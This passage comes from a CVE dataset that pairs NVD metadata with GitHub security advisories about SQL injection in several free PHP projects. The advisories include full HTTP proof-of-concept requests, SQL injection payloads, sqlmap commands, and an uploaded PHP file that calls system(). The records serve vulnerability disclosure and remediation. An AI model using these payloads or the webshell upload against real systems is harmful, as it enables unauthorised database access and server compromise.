- Conduct routine code reviews, penetration testing, and dependency checks to catch new or recurring flaws.
---
## **6. References**
- [Gym Management System Homepage](https://codezips.com/php/gymmanagementsytem/)
- [OWASP: SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [sqlmap Project](https://sqlmap.org/)
---
**Disclaimer:**
This advisory is intended for responsible disclosure. Any unauthorized exploitation of the described vulnerability may violate applicable laws. Stakeholders and the vendor are strongly encouraged to apply remediation measures immediately to ensure data protection and maintain system integrity. | Security Advisory: SQL Injection in Gym Management System (PHP) v1.0 | https://api.github.com/repos/nbeisss/CVE/issues/1/comments | 0 | 2025-01-13T15:23:04Z | 2025-01-13T15:23:04Z | https://github.com/nbeisss/CVE/issues/1 | 2,784,323,486 | 1 | 6,509 |
CVE-2025-0561 | 2025-01-19T00:15:25.077 | A vulnerability has been found in itsourcecode Farm Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /add-pig.php. The manipulation of the argument pigno leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yunhai666/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292522"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292522"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.483396"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:farm_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D2822E78-3BA7-4DFA-9CCE-39AB33ABA296",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/yunhai666/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yunhai666",
"cve"
] | # Itsourcecode Farm Management System In PHP v1.0 add-pig.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Farm Management System In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/farm-management-system-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ weiwei-abc
## Vulnerable File
+ add-pig.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Farm-Management-System-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'add-pig.php' file of the 'Farm Management System In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "pigno" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="1045" alt="Image" src="https://github.com/user-attachments/assets/255ff14c-d453-4d77-a520-61a2cc6ee284" />
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input verification for the "pigno" parameter, a serious SQL injection vulnerability has been discovered in the login function of the "Farm Management System In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
POST /add-pig.php HTTP/1.1
Host: 192.168.1.136:1219
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------359458591942496535511331165261
Content-Length: 1199
Origin: http://192.168.1.136:1219
Connection: close
Referer: http://192.168.1.136:1219/add-pig.php
Cookie: pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%227LWOmQxn1kFNKDQIKEqUQQ%3D%3D%22%2C%22mac%22%3A%22f46715269295f7bc9c1753cf49cb29de885e0738%22%2C%22payload%22%3A%22uwlGMpERga3ktRQQmcLQUg%3D%3D%22%7D; PHPSESSID=4j8anjs7rlcs27867bnlmj1116; phpMyAdmin=5r1opuf2mqc9j30vli7mfrhvtt; pmaAuth-1=%7B%22iv%22%3A%22HbgyCK8mDtH6Yh3l1rTCWw%3D%3D%22%2C%22mac%22%3A%226259e5b1095aeff224b50540aea65c624fb900c9%22%2C%22payload%22%3A%22SiwuQJzR6qfxiA6velzoYRz%2BXnITRHrg37ZL9M1sbb0%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=1
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigno"
pig-fms-5320
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="weight"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="arrived"
2024-06-01
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="gender"
male
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="status"
active
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="breed"
1
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="remark"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigphoto"; filename="123.php"
Content-Type: application/octet-stream
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="submit"
-----------------------------359458591942496535511331165261--
```
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ stacked queries
## Vulnerability location:
+ 'pigno' parameter
## Payload:
```
Parameter: MULTIPART pigno ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigno"
pig-fms-5320' RLIKE (SELECT (CASE WHEN (5474=5474) THEN 0x7069672d666d732d35333230 ELSE 0x28 END)) AND 'YqbQ'='YqbQ
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="weight"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="arrived"
2024-06-01
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="gender"
male
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="status"
active
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="breed"
1
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="remark"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigphoto"; filename="123.php"
Content-Type: application/octet-stream
<?php system("ipconfig"); ?>
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="submit"
-----------------------------359458591942496535511331165261--
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: -----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigno"
pig-fms-5320' AND EXTRACTVALUE(4487,CONCAT(0x5c,0x7178767871,(SELECT (ELT(4487=4487,1))),0x71786a7a71)) AND 'nUep'='nUep
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="weight"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="arrived"
2024-06-01
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="gender"
male
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="status"
active
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="breed"
1
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="remark"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigphoto"; filename="123.php"
Content-Type: application/octet-stream
<?php system("ipconfig"); ?>
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="submit"
-----------------------------359458591942496535511331165261--
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: -----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigno"
pig-fms-5320' RLIKE SLEEP(5) AND 'bQdJ'='bQdJ
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="weight"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="arrived"
2024-06-01
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="gender"
male
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="status"
active
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="breed"
1
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="remark"
123
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="pigphoto"; filename="123.php"
Content-Type: application/octet-stream
-----------------------------359458591942496535511331165261
Content-Disposition: form-data; name="submit"
-----------------------------359458591942496535511331165261--
```
<img width="665" alt="Image" src="https://github.com/user-attachments/assets/ab725141-f98a-477b-8610-f1ec1f02487d" />
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="540" alt="Image" src="https://github.com/user-attachments/assets/324ef3d5-4fdc-459d-b8b1-3eb04972554b" />
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Farm Management System In PHP v1.0 add-pig.php SQL injection | https://api.github.com/repos/yunhai666/cve/issues/1/comments | 0 | 2025-01-16T12:22:34Z | 2025-01-16T12:22:34Z | https://github.com/yunhai666/cve/issues/1 | 2,792,588,805 | 1 | 6,510 |
CVE-2025-0562 | 2025-01-19T02:15:24.380 | A vulnerability was found in Codezips Gym Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dashboard/admin/health_status_entry.php. The manipulation of the argument usrid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuSir5211314/-sir/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292523"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292523"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.484184"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codezips:gym_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8609E306-3171-4B5D-AD7A-5E95C463E015",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuSir5211314/-sir/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LiuSir5211314",
"-sir"
] | # **Security Advisory: SQL Injection in CodeZips Gym Management System (PHP) v1.0**
**Discovered By:刘sir
---
## **1. Affected Product**
- **Product Name**: Gym Management System in PHP with Source Code
- **Version**: v1.0
- **Vulnerable File**: `/dashboard/admin/health_status_entry.php`
- **Parameter**: `usrid`
- **Vendor Homepage**: [[Gym Management System](https://codezips.com/php/gymmanagementsytem/)](https://codezips.com/php/gymmanagementsytem/)
- **Download Link**: [[Source Code](https://codeload.github.com/codezips/gym-management-system-php/zip/master)](https://codeload.github.com/codezips/gym-management-system-php/zip/master)
**No authentication required** to exploit this vulnerability.
---
## **2. Overview**
A critical SQL injection vulnerability exists in the `usrid` parameter within `/dashboard/admin/health_status_entry.php`. Attackers can inject arbitrary SQL code via specially crafted values, bypassing input validation. This could lead to unauthorized database access, data manipulation, and potentially full system compromise.
---
## **3. Technical Details**
### **3.1 Vulnerability Type**
- **SQL Injection**
- Error-based
- Time-based blind
### **3.2 Sample Payloads**
```bash
# error-based
usrid=1529336794' AND GTID_SUBSET(CONCAT(0x716a787071,(SELECT (ELT(1368=1368,1))),0x71627a7171),1368) AND 'rZfT'='rZfT&calorie=111&height=111&weight=111&fat=11&remarks=111&submit=SUBMIT
# time-based blind
usrid=1529336794' AND (SELECT 4363 FROM (SELECT(SLEEP(5)))RoxG) AND 'DvDr'='DvDr&calorie=111&height=111&weight=111&fat=11&remarks=111&submit=SUBMIT
```
### **3.3 Proof of Concept (PoC)**
```bash
sqlmap -u "192.168.10.5:2227/dashboard/admin/health_status_entry.php" --data="usrid=1529336794&calorie=111&height=111&weight=111&fat=11&remarks=111&submit=SUBMIT" --cookie="PHPSESSID=h177n9r00khd5at2r3f9oop7un" --batch --level=5 --risk=3 --dbms=mysql --tamper=space2comment
```
**Screenshots**:
<img width="949" alt="Image" src="https://github.com/user-attachments/assets/c1d91880-a54e-4560-892c-e383321083c8" />
---
## **4. Impact**
- **Database Compromise**: Attackers can read, modify, or delete data.
- **Data Leakage**: Sensitive customer/payment information could be exposed.
- **System Interruption**: Malicious queries may degrade performance or crash the application.
- **Privilege Escalation**: Potential elevation of privileges leading to broader system takeover.
---
## **5. Recommendations**
1. **Use Prepared Statements / Parameter Binding**
- Separate SQL logic from user-supplied data to prevent code injection.
2. **Enforce Strict Input Validation**
- Validate and sanitize incoming fields (`usrid`) against unexpected characters or formats.
3. **Apply the Principle of Least Privilege**
- Configure database users with minimal privileges. Avoid high-privilege accounts for routine queries.
4. **Schedule Regular Security Audits**
- Conduct routine code reviews, penetration testing, and dependency checks to catch new or recurring flaws.
---
## **6. References**
- [[Gym Management System Homepage](https://codezips.com/php/gymmanagementsytem/)](https://codezips.com/php/gymmanagementsytem/)
- [[OWASP: SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)](https://owasp.org/www-community/attacks/SQL_Injection)
- [[sqlmap Project](https://sqlmap.org/)](https://sqlmap.org/)
---
**Disclaimer:**
This advisory is intended for responsible disclosure. Any unauthorized exploitation of the described vulnerability may violate applicable laws. Stakeholders and the vendor are strongly encouraged to apply remediation measures immediately to ensure data protection and maintain system integrity. | # **Security Advisory: SQL Injection in CodeZips Gym Management System (PHP) v1.0**--------------CVE-2025-0562 | https://api.github.com/repos/LiuSir5211314/cve/issues/1/comments | 0 | 2025-01-17T03:16:08Z | 2025-01-23T10:29:29Z | https://github.com/LiuSir5211314/cve/issues/1 | 2,794,397,887 | 1 | 6,511 |
CVE-2025-0563 | 2025-01-19T02:15:24.560 | A vulnerability was found in code-projects Fantasy-Cricket 1.0. It has been classified as critical. Affected is an unknown function of the file /dash/update.php. The manipulation of the argument uname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://code-projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuSir5211314/-sir/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292524"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292524"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.484185"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:anisha:fantasy-cricket:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EDA23A28-2D50-44DC-B909-1D97717613D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuSir5211314/-sir/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LiuSir5211314",
"-sir"
] | # code-projects.org"Fantasy-Cricket" in PHP 1.0 "update.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Fantasy-Cricket IN PHP, CSS, JavaScript, AND MYSQL | FREE DOWNLOAD
## Vendor Homepage
+ https://code-projects.org/fantasy-cricket-in-php-css-javascript-and-mysql-free-download/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ 刘sir
## Vulnerable File
+ update.php
## VERSION(S)
+ V1.0
## Software Link
+ https://download.code-projects.org/details/044627cb-ec50-45d9-ad74-b04ab138ddbf
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'update.php' file of the 'Fantasy-Cricket' project. The reason for this issue is that attackers inject malicious code from the parameter "uname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP "Fantasy-Cricket", discovered a critical SQL injection vulnerability in the "update.php" file. This vulnerability stems from insufficient user input validation of the "uname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
---
POST /dash/update.php HTTP/1.1
Host: 192.168.40.70:182
Content-Length: 96
Cache-Control: max-age=0
Origin: http://192.168.40.70:182
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.40.70:182/dash/account.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
